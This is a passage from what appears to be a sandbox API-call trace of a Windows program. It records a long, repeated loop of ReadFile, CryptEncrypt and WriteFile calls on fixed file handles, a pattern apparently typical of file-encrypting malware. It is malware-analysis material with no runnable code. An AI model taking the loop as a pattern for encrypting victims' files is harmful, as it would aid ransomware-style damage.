lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.103] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.103] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.103] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.103] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.103] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.103] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.103] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.103] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.104] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.104] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.104] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.104] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.104] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.104] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.104] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.104] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.104] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.105] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.105] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.105] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.105] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.105] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.105] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.105] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.105] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.105] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.105] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.105] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.105] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.106] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.106] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.106] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.106] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.106] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.106] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.106] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.107] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.107] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.107] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.107] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.107] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.107] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.107] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.107] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.107] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.107] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.107] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.108] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.108] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.108] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.108] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.108] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.108] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.109] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.109] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.109] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.109] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.109] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.109] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.109] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.109] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.109] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.109] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.109] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.110] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.110] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.110] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.110] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.110] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.110] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.110] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.110] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.111] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.111] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.111] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.111] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.111] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.111] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.111] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.111] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.111] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.111] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.111] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.111] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.112] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.112] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.112] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.112] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.112] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.112] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.112] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.112] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.112] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.113] CryptEncrypt (in: hKey=0x2facc8, 